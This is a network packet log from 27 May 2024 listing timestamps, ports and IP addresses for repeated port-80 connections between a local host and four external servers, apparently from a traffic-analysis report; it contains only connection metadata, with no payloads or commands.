May 27, 2024 12:20:56.820987940 CEST	80	63172	199.59.243.225	192.168.2.7
May 27, 2024 12:20:56.821122885 CEST	63172	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:56.822839975 CEST	63172	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:56.829314947 CEST	80	63172	199.59.243.225	192.168.2.7
May 27, 2024 12:20:56.829327106 CEST	80	63172	199.59.243.225	192.168.2.7
May 27, 2024 12:20:57.289233923 CEST	80	63172	199.59.243.225	192.168.2.7
May 27, 2024 12:20:57.289266109 CEST	80	63172	199.59.243.225	192.168.2.7
May 27, 2024 12:20:57.289285898 CEST	80	63172	199.59.243.225	192.168.2.7
May 27, 2024 12:20:57.289339066 CEST	63172	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:57.289397001 CEST	63172	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:58.336173058 CEST	63172	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.356446028 CEST	63173	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.365742922 CEST	80	63173	199.59.243.225	192.168.2.7
May 27, 2024 12:20:59.365902901 CEST	63173	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.368424892 CEST	63173	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.373306036 CEST	80	63173	199.59.243.225	192.168.2.7
May 27, 2024 12:20:59.824805021 CEST	80	63173	199.59.243.225	192.168.2.7
May 27, 2024 12:20:59.824830055 CEST	80	63173	199.59.243.225	192.168.2.7
May 27, 2024 12:20:59.824918985 CEST	80	63173	199.59.243.225	192.168.2.7
May 27, 2024 12:20:59.825139999 CEST	63173	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.825267076 CEST	63173	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.833990097 CEST	63173	80	192.168.2.7	199.59.243.225
May 27, 2024 12:20:59.838902950 CEST	80	63173	199.59.243.225	192.168.2.7
May 27, 2024 12:21:04.933269978 CEST	63174	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:04.938395023 CEST	80	63174	212.227.172.253	192.168.2.7
May 27, 2024 12:21:04.941972017 CEST	63174	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:04.958076954 CEST	63174	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:04.963047981 CEST	80	63174	212.227.172.253	192.168.2.7
May 27, 2024 12:21:05.581367016 CEST	80	63174	212.227.172.253	192.168.2.7
May 27, 2024 12:21:05.581413031 CEST	80	63174	212.227.172.253	192.168.2.7
May 27, 2024 12:21:05.581871986 CEST	63174	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:08.185463905 CEST	63174	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:09.199351072 CEST	63175	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:09.204411983 CEST	80	63175	212.227.172.253	192.168.2.7
May 27, 2024 12:21:09.204574108 CEST	63175	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:09.206199884 CEST	63175	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:09.211148977 CEST	80	63175	212.227.172.253	192.168.2.7
May 27, 2024 12:21:09.912512064 CEST	80	63175	212.227.172.253	192.168.2.7
May 27, 2024 12:21:09.912532091 CEST	80	63175	212.227.172.253	192.168.2.7
May 27, 2024 12:21:09.912570953 CEST	80	63175	212.227.172.253	192.168.2.7
May 27, 2024 12:21:09.912616968 CEST	63175	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:09.912616968 CEST	63175	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:10.711087942 CEST	63175	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:11.731405973 CEST	63176	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:11.736404896 CEST	80	63176	212.227.172.253	192.168.2.7
May 27, 2024 12:21:11.736490965 CEST	63176	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:11.738023043 CEST	63176	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:11.742964029 CEST	80	63176	212.227.172.253	192.168.2.7
May 27, 2024 12:21:11.743119955 CEST	80	63176	212.227.172.253	192.168.2.7
May 27, 2024 12:21:12.391423941 CEST	80	63176	212.227.172.253	192.168.2.7
May 27, 2024 12:21:12.391699076 CEST	80	63176	212.227.172.253	192.168.2.7
May 27, 2024 12:21:12.391753912 CEST	63176	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:13.242221117 CEST	63176	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:14.262120962 CEST	63177	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:14.378134012 CEST	80	63177	212.227.172.253	192.168.2.7
May 27, 2024 12:21:14.378289938 CEST	63177	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:14.380304098 CEST	63177	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:14.385210991 CEST	80	63177	212.227.172.253	192.168.2.7
May 27, 2024 12:21:15.017391920 CEST	80	63177	212.227.172.253	192.168.2.7
May 27, 2024 12:21:15.018312931 CEST	80	63177	212.227.172.253	192.168.2.7
May 27, 2024 12:21:15.018430948 CEST	63177	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:15.021069050 CEST	63177	80	192.168.2.7	212.227.172.253
May 27, 2024 12:21:15.025929928 CEST	80	63177	212.227.172.253	192.168.2.7
May 27, 2024 12:21:20.230214119 CEST	63178	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:20.235361099 CEST	80	63178	199.59.243.225	192.168.2.7
May 27, 2024 12:21:20.235443115 CEST	63178	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:20.238209963 CEST	63178	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:20.243252039 CEST	80	63178	199.59.243.225	192.168.2.7
May 27, 2024 12:21:20.718554020 CEST	80	63178	199.59.243.225	192.168.2.7
May 27, 2024 12:21:20.718710899 CEST	80	63178	199.59.243.225	192.168.2.7
May 27, 2024 12:21:20.718766928 CEST	63178	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:20.721152067 CEST	80	63178	199.59.243.225	192.168.2.7
May 27, 2024 12:21:20.721201897 CEST	63178	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:21.742322922 CEST	63178	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:22.763550997 CEST	63179	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:22.769007921 CEST	80	63179	199.59.243.225	192.168.2.7
May 27, 2024 12:21:22.769094944 CEST	63179	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:22.771965981 CEST	63179	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:22.776794910 CEST	80	63179	199.59.243.225	192.168.2.7
May 27, 2024 12:21:23.227595091 CEST	80	63179	199.59.243.225	192.168.2.7
May 27, 2024 12:21:23.227615118 CEST	80	63179	199.59.243.225	192.168.2.7
May 27, 2024 12:21:23.227727890 CEST	63179	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:23.227822065 CEST	80	63179	199.59.243.225	192.168.2.7
May 27, 2024 12:21:23.228090048 CEST	63179	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:25.885699987 CEST	63179	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:26.901927948 CEST	63180	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:26.906910896 CEST	80	63180	199.59.243.225	192.168.2.7
May 27, 2024 12:21:26.907021999 CEST	63180	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:26.909938097 CEST	63180	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:26.914947987 CEST	80	63180	199.59.243.225	192.168.2.7
May 27, 2024 12:21:26.915051937 CEST	80	63180	199.59.243.225	192.168.2.7
May 27, 2024 12:21:27.372297049 CEST	80	63180	199.59.243.225	192.168.2.7
May 27, 2024 12:21:27.372328997 CEST	80	63180	199.59.243.225	192.168.2.7
May 27, 2024 12:21:27.372353077 CEST	80	63180	199.59.243.225	192.168.2.7
May 27, 2024 12:21:27.372524977 CEST	63180	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:27.372525930 CEST	63180	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:28.414308071 CEST	63180	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.432687998 CEST	63181	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.437819958 CEST	80	63181	199.59.243.225	192.168.2.7
May 27, 2024 12:21:29.438086033 CEST	63181	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.439800024 CEST	63181	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.444729090 CEST	80	63181	199.59.243.225	192.168.2.7
May 27, 2024 12:21:29.915868998 CEST	80	63181	199.59.243.225	192.168.2.7
May 27, 2024 12:21:29.915905952 CEST	80	63181	199.59.243.225	192.168.2.7
May 27, 2024 12:21:29.915929079 CEST	80	63181	199.59.243.225	192.168.2.7
May 27, 2024 12:21:29.916143894 CEST	63181	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.916143894 CEST	63181	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.918648958 CEST	63181	80	192.168.2.7	199.59.243.225
May 27, 2024 12:21:29.923602104 CEST	80	63181	199.59.243.225	192.168.2.7
May 27, 2024 12:21:34.983107090 CEST	63182	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:34.988234043 CEST	80	63182	213.171.195.105	192.168.2.7
May 27, 2024 12:21:34.988302946 CEST	63182	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:34.990835905 CEST	63182	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:34.995702982 CEST	80	63182	213.171.195.105	192.168.2.7
May 27, 2024 12:21:35.601571083 CEST	80	63182	213.171.195.105	192.168.2.7
May 27, 2024 12:21:35.601675034 CEST	80	63182	213.171.195.105	192.168.2.7
May 27, 2024 12:21:35.601800919 CEST	63182	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:36.492213964 CEST	63182	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:37.513492107 CEST	63183	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:37.815392017 CEST	80	63183	213.171.195.105	192.168.2.7
May 27, 2024 12:21:37.815530062 CEST	63183	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:37.817570925 CEST	63183	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:37.822582960 CEST	80	63183	213.171.195.105	192.168.2.7
May 27, 2024 12:21:38.409436941 CEST	80	63183	213.171.195.105	192.168.2.7
May 27, 2024 12:21:38.410063028 CEST	80	63183	213.171.195.105	192.168.2.7
May 27, 2024 12:21:38.410109997 CEST	63183	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:39.320365906 CEST	63183	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:40.356503010 CEST	63184	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:40.361541986 CEST	80	63184	213.171.195.105	192.168.2.7
May 27, 2024 12:21:40.361630917 CEST	63184	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:40.363502979 CEST	63184	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:40.368299007 CEST	80	63184	213.171.195.105	192.168.2.7
May 27, 2024 12:21:40.368444920 CEST	80	63184	213.171.195.105	192.168.2.7
May 27, 2024 12:21:40.966272116 CEST	80	63184	213.171.195.105	192.168.2.7
May 27, 2024 12:21:40.966346025 CEST	80	63184	213.171.195.105	192.168.2.7
May 27, 2024 12:21:40.966398954 CEST	63184	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:41.867178917 CEST	63184	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:42.886141062 CEST	63185	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:42.891316891 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:42.891395092 CEST	63185	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:42.893456936 CEST	63185	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:42.898412943 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.676992893 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677011013 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677021980 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677026033 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677031040 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677038908 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677042961 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:43.677234888 CEST	63185	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:43.683480024 CEST	63185	80	192.168.2.7	213.171.195.105
May 27, 2024 12:21:43.688378096 CEST	80	63185	213.171.195.105	192.168.2.7
May 27, 2024 12:21:48.721044064 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:48.725996971 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:48.726070881 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:48.728432894 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:48.733376026 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.329905033 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.329972982 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.329987049 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.329998016 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330010891 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330022097 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330034018 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330065966 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330086946 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330115080 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.330161095 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.330230951 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.331661940 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.335212946 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.335228920 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.335235119 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.335453033 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.418694973 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.418714046 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.418813944 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.418838978 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.418854952 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.418864965 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.418878078 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.419735909 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.419935942 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.419981003 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.419994116 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420011044 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.420011044 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.420073986 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420089006 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420208931 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.420208931 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.420443058 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420454979 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420465946 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420960903 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420974016 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.420985937 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.421103001 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.421116114 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.421133041 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.421133041 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:49.421540022 CEST	80	63186	203.161.43.227	192.168.2.7
May 27, 2024 12:21:49.422509909 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:50.242305040 CEST	63186	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:51.261591911 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:51.266632080 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:51.270509005 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:51.270509958 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:51.275582075 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644010067 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644030094 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644041061 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644056082 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644067049 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644084930 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644098043 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.644136906 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644155025 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644162893 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.644167900 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644207954 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.644217014 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644227982 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644262075 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.644598007 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.644642115 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.645451069 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.645488977 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.649015903 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.649053097 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.650306940 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.650317907 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.650358915 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.653795958 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.653809071 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.653850079 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.655111074 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.655122042 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.655148983 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.658526897 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.658540964 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.658586025 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.659876108 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.659888029 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.659897089 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.659924030 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.663419008 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.663431883 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.663465977 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.664645910 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.664658070 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.664683104 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.668198109 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.668210983 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.668234110 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.669420958 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.669449091 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.669465065 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.672935009 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.672947884 CEST	80	63187	203.161.43.227	192.168.2.7
May 27, 2024 12:21:52.672966957 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.672988892 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:52.773582935 CEST	63187	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:53.792735100 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:53.797955036 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:53.798069954 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:53.799957991 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:53.804860115 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:53.804953098 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432296038 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432318926 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432332039 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432342052 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432354927 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432364941 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432374954 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432385921 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432387114 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.432399988 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432456017 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.432622910 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.432660103 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.437330961 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.437391996 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.437402010 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.437414885 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.437448978 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.437486887 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.525265932 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525293112 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525305986 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525316000 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525331020 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525351048 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.525408983 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.525567055 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525615931 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.525749922 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525769949 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525784969 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525798082 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.525820017 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.525835037 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.526405096 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.526432037 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.526444912 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.526454926 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.526465893 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.526488066 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.526514053 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.527322054 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.527374029 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.527383089 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.527395010 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.527407885 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.527419090 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.527441025 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.527467012 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:54.528151035 CEST	80	63188	203.161.43.227	192.168.2.7
May 27, 2024 12:21:54.528194904 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:55.305488110 CEST	63188	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.324436903 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.329510927 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.329583883 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.331665039 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.336658001 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933429956 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933455944 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933466911 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933478117 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933490992 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933581114 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933600903 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933613062 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933626890 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933629036 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.933656931 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.933684111 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.933697939 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:56.938652992 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.938695908 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.938707113 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:56.938786983 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.022239923 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.022275925 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.022368908 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.022387028 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.022414923 CEST	80	63189	203.161.43.227	192.168.2.7
